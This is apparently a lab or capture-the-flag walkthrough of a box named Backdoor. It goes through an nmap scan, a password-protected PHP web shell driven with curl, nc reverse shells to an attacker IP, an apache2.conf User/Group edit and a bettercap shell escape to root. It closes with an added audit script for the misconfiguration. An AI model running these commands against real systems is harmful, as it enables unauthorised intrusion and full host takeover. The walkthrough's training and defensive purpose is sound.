# Lab setup
Download: Backdoor
Networking: NAT, target IP 192.168.1.183
# Penetration process
# Initial information gathering
nmap service scan output:

```text
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)
```
Directory enumeration found a web shell at http://192.168.1.183/Backdoor/php-backdoor.php
Fuzzing its POST parameters turned up `password` and `cmd`; with `password=newpassword` the backdoor runs the command: curl -X POST -d 'password=newpassword&cmd=id' http://192.168.1.183/Backdoor/php-backdoor.php
Reverse shell: start a listener on the attacking host (nc -lvnp 4444), then call the backdoor with the `-e` form of nc (the same form the privilege-escalation step below relies on; `nc host port` on its own only opens a connection and attaches no shell): curl -X POST -d 'password=newpassword&cmd=nc -e /bin/bash 192.168.1.129 4444' http://192.168.1.183/Backdoor/php-backdoor.php
# Privilege escalation
Searching for writable files turned up /etc/apache2/apache2.conf, which the www-data shell can edit.
Check which users have a login shell (this is where the rootkit account shows up): grep bash /etc/passwd | cut -d: -f1
Apache on Debian starts as root and only then drops to the User/Group set in its config (by default the ${APACHE_RUN_USER}/${APACHE_RUN_GROUP} placeholders filled in from envvars, as the comment on line 114 says), so change lines 115-116 of that file to run it as rootkit, then reboot the box (the writeup does this with sudo reboot) so Apache comes back with the new settings:

```text
114 # These need to be set in /etc/apache2/envvars
115 User rootkit
116 Group rootkit
```

Start the listener again and trigger the backdoor again; the shell that comes back is now the rootkit user.
rootkit may run bettercap as root: sudo bettercap
bettercap's interactive prompt executes any line prefixed with `!` as a shell command, so with a listener waiting on port 8888: ! nc -e /bin/bash 192.168.1.129 8888
The connection that comes back is a root shell.
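As an added check, not from the original writeup: a small audit script for the two conditions this escalation chained together, a config file that a low-privileged user can write and an Apache User/Group pointing at a real login account. It takes the config path as an argument; it assumes GNU stat (Linux, as on the Debian target), and the helper names are mine.

```shell
#!/bin/sh
# Added example, not code from the original writeup.
# Audits an apache2.conf for the two conditions chained above:
#   1. the file is writable by group or others (so www-data could edit it)
#   2. User/Group name a real login account instead of www-data or the
#      ${APACHE_RUN_USER}/${APACHE_RUN_GROUP} placeholders from envvars

# Print the effective value of a directive: last occurrence wins, comment
# lines are ignored because a leading '#' makes $1 differ from the name.
apache_directive() {   # $1 = config file, $2 = directive name
    awk -v d="$2" '$1 == d { v = $2 } END { print v }' "$1"
}

# Exit 0 when the octal mode string $1 (e.g. 664) grants write to $2,
# which is "group" or "other". Works on the digit characters directly,
# so a leading digit is never misread as an octal prefix.
mode_writable_by() {
    m="$1"
    if [ "$2" = group ]; then m="${m%?}"; fi   # strip the 'other' digit
    d="${m#"${m%?}"}"                          # last character that is left
    [ $((d & 2)) -ne 0 ]
}

# Audit one config file. Prints findings, returns 1 if there are any.
check_apache_conf() {
    f="$1"; bad=0
    mode=$(stat -c '%a' "$f")                  # GNU stat; Linux assumed
    if mode_writable_by "$mode" other; then
        echo "FINDING: $f is world-writable (mode $mode)"; bad=1
    elif mode_writable_by "$mode" group; then
        echo "FINDING: $f is group-writable (mode $mode, group $(stat -c '%G' "$f"))"; bad=1
    fi
    for directive in User Group; do
        v=$(apache_directive "$f" "$directive")
        case "$v" in
            ''|www-data|'${APACHE_RUN_USER}'|'${APACHE_RUN_GROUP}') ;;
            *) echo "FINDING: $directive $v in $f (Apache drops to this account, not www-data)"
               grep -n "^[[:space:]]*$directive[[:space:]]" "$f" || true
               bad=1 ;;
        esac
    done
    return $bad
}

# Usage: ./apache-audit.sh /etc/apache2/apache2.conf   (exit 1 on findings)
if [ -n "${1:-}" ]; then
    check_apache_conf "$1"
fi
```

The User/Group check deliberately treats the envvars placeholders as clean; the writeup's edit replaced them with a literal account name, which is exactly the pattern the `case` flags.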